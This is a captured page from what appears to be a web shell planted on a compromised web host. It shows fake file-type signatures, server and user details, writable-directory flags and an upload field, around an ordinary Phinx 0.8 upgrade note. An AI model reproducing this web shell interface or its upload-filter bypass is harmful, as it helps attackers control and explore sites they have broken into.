%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/public_html/vendor/robmorgan/phinx/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/public_html/vendor/robmorgan/phinx/UPGRADE_0.8.md
# Upgrading Phinx to 0.8

* Phinx 0.8 allows for `phinx rollback` and `phinx status` to operate on migrations in reverse execution order,
rather than reverse creation order. To achieve this new ordering, you will need to add a new entry in your
`phinx.yml` file (or equivalent).  
  
  The setting is called `version_order` and supports 2 values:
  * `creation` - this is the default value and matches the standard behaviour of executing rollbacks in the
  reverse order based upon the creation datetime (also known as `version`).
  * `execution` - this is the new value and will execute rollbacks in the reverse order in which they were
  applied.

  This feature will be of most importance when development of migrations takes place in different branches
  within a codebase and are merged in to master for deployment. It will no longer matter when the migrations
  were created if it becomes necessary to rollback the migrations.

VaKeR 2022